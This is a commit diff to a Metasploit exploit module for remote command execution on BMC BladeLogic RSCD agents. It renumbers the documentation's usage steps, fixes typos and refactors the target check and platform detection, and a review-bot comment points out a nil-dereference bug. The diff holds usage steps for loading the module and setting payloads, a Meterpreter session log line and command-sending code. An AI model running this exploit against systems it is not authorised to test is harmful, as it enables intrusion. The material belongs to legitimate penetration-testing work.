Tidied up platform detection, check method, and minor typos.
parent
6568d29b67
commit
333ee893d3
|
@ -19,8 +19,8 @@ To use this exploit you will need access to BMC BladeLogic Server Automation.
|
|||
4. Load the module `use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce`.
|
||||
5. Select the generic command target `set target 3`.
|
||||
6. Select a generic command payload `set payload cmd/unix/generic` or `set payload cmd/windows/generic`.
|
||||
6. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
|
||||
7. Run the exploit `exploit`.
|
||||
7. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
|
||||
8. Run the exploit `exploit`.
|
||||
|
||||
The result should be that the string `MSF` is returned and output.
|
||||
|
||||
|
@ -63,7 +63,7 @@ This module target provides support for command staging to enable arbitrary Meta
|
|||
[*] Meterpreter session 1 opened (172.31.58.107:4444 -> 34.239.181.84:56233) at 2018-01-14 00:54:49 +0000
|
||||
|
||||
### Target 2: Unix/Linux
|
||||
This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same was as target 1.
|
||||
This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same way as target 1.
|
||||
|
||||
### Target 3: Generic Cmd
|
||||
This target can be used with *cmd* payloads to execute operating system commands against the target host.
|
||||
|
|
|
@ -78,31 +78,30 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
# Send agentinfo request and check result
|
||||
print_status('Checking for BMC with agentinfo request.')
|
||||
vprint_status('Checking for BMC with agentinfo request.')
|
||||
res = send_agentinfo_request
|
||||
if res && !res.empty && res.start_with?('Response: ')
|
||||
# Check for length field in response packet
|
||||
res_pkt = res[10..res.length]
|
||||
if res_pkt.length > 3
|
||||
length_field = res_pkt[0..3].unpack('N')[0]
|
||||
if res_pkt.length - length_field == 4
|
||||
# Response packet appears to be in the correct format
|
||||
print_warning('Unexpected agentinto response. Enable verbose ' \
|
||||
'output for actual response.')
|
||||
vprint_warning(res)
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
# The response wasn't in the expected format, probably not BMC RSCD
|
||||
print_error('The target does not appear to be a BMC RSCD agent.')
|
||||
vprint_error(res)
|
||||
return Exploit::CheckCode::Safe
|
||||
else
|
||||
# BMC detected, print platform and return
|
||||
print_good('BMC RSCD agent detected, platform appears to be ' + res)
|
||||
return Exploit::CheckCode::Detected
|
||||
# Check for successful platform detection
|
||||
if res[0] == 1
|
||||
vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])
|
||||
return CheckCode::Detected
|
||||
end
|
||||
|
||||
# Get first four bytes of the packet which should hold the content length
|
||||
res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0
|
||||
|
||||
# Return unknown if the packet format appears correct (length field check)
|
||||
if res[1] && res[1].length - 4 == res_len
|
||||
vprint_warning('Target appears to be BMC, however an unexpected ' \
|
||||
'agentinfo response was returned.')
|
||||
vprint_warning('Response: ' + res[1])
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
||||
# Invalid response, probably not a BMC RSCD target
|
||||
vprint_error('The target does not appear to be a BMC RSCD agent.')
|
||||
vprint_error('Response: ' + res[1]) if res[1]
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -113,7 +112,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# Attempt to detect the target platform
|
||||
vprint_status('Detecting remote platform for auto target selection.')
|
||||
platform = send_agentinfo_request
|
||||
target_name = if platform.downcase.include?('windows')
|
||||
|
||||
# Fail if platform detection was unsuccessful
|
||||
if platform[0].zero?
|
||||
fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \
|
||||
'detecting target platform.')
|
||||
end
|
||||
|
||||
# Set target based on returned platform
|
||||
target_name = if platform[1].downcase.include?('windows')
|
||||
'Windows/VBS Stager'
|
||||
else
|
||||
'Unix/Linux'
|
||||
|
@ -159,7 +166,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# Generate and send the payload
|
||||
vprint_status('Sending command to execute.')
|
||||
vprint_status('Command: ' + command)
|
||||
sock.put(generate_cmd_pkt(command))
|
||||
|
||||
# Finish the nexec request
|
||||
|
@ -208,9 +214,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
res = sock.get_once
|
||||
disconnect
|
||||
|
||||
# Extract platform from response
|
||||
return res.split(';')[4] if res && res.split(';').length > 6
|
||||
'Response: ' + res
|
||||
# Return the platform field from the response if it looks valid
|
||||
res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0
|
||||
return [1, res.split(';')[4]] if res &&
|
||||
res.split(';').length > 6 &&
|
||||
res.length == (res_len + 4)
|
||||
|
||||
# Invalid or unexpected response format, return the complete response
|
||||
[0, res]
|
||||
end
|
||||
|
||||
# Connect to the target and upgrade to an encrypted connection
|
||||
|
|
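Review bot: In the new send_agentinfo_request, `res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0` dereferences `res` one line before the `if res &&` guard on the following line, so a target that times out or closes the socket (sock.get_once returning nil) raises NoMethodError instead of reaching the `[0, res]` fallback. The guard order should be swapped into that line, e.g. `res_len = res && res.length > 3 ? res[0..3].unpack('N')[0] : 0`, which also keeps check's `platform[0].zero?` path in exploit reachable for a silent host. The enclosing method begins outside the hunk, so whether an earlier return already handles a nil response cannot be confirmed from here. As a minor style point, `res.split(';')` is evaluated twice in the same condition and could be bound once to a local before the return.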